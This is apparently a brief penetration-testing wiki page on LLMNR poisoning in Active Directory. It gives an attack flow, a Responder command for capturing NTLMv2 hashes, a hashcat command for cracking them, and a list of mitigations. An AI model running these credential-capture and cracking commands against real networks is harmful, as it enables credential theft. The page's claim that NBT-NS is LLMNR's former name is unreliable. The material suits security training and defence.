> For the complete documentation index, see [llms.txt](https://wiki.bufu-sec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.bufu-sec.com/active-directory/mitm_relay/llmnr_poisoning.md).

# LLMNR Poisoning

## What is LLMNR?

* Used to identify hosts when DNS fails
* Previously known as NBT-NS
* Key flaw: services utilize a user's username and NTLMv2 hash when appropriately responded too

## Attack Flow

* Trick victim into connecting to malicious server under our control
* Capture hash
* Service name cannot be resolvable over DNS

## Exploitation

```bash
# Run responder
python responder.py -I tun0 -rdwv

# Crack hash with hashcat
hashcat -a 0 -m 5600 hashes.txt rockyou.txt
```

## Mitigation

* Disable LLMNR and NBT-NS
* If the functions can't be disabled, then
  * require Network Access Control
  * require strong password policy
